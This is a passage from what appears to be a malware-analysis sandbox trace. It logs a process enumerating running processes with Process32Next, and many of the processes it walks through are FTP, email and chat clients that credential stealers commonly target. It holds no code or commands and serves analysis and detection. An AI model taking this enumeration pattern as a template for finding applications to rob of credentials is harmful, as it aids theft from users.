th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0201.736] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0201.739] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.742] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0201.745] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0201.752] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0201.755] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0201.758] CloseHandle (hObject=0x2274) returned 1 [0201.758] Sleep (dwMilliseconds=0x64) [0201.943] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0201.966] Process32First (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.968] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0201.969] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0201.971] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.973] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0201.974] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.976] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0201.977] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0201.982] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0201.984] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.985] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.987] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0201.989] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.990] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.992] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.994] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.062] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.064] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.066] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.069] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0202.071] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0202.073] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0202.078] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.080] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.082] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0202.085] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0202.087] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0202.093] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0202.096] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.098] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0202.100] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0202.103] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.158] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0202.160] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0202.162] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0202.164] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0202.166] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0202.170] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0202.172] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0202.174] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0202.176] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0202.178] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0202.180] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0202.183] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0202.187] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0202.189] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0202.190] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0202.192] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0202.194] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0202.196] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0202.197] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0202.224] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0202.227] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0202.233] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0202.238] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0202.282] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0202.390] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0202.392] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0202.394] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0202.396] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0202.398] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0202.400] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0202.453] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0202.455] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0202.457] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0202.459] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0202.461] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0202.463] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0202.469] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0202.471] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0202.473] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0202.475] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0202.478] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0202.538] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0202.541] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0202.544] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0202.546] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0202.549] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, 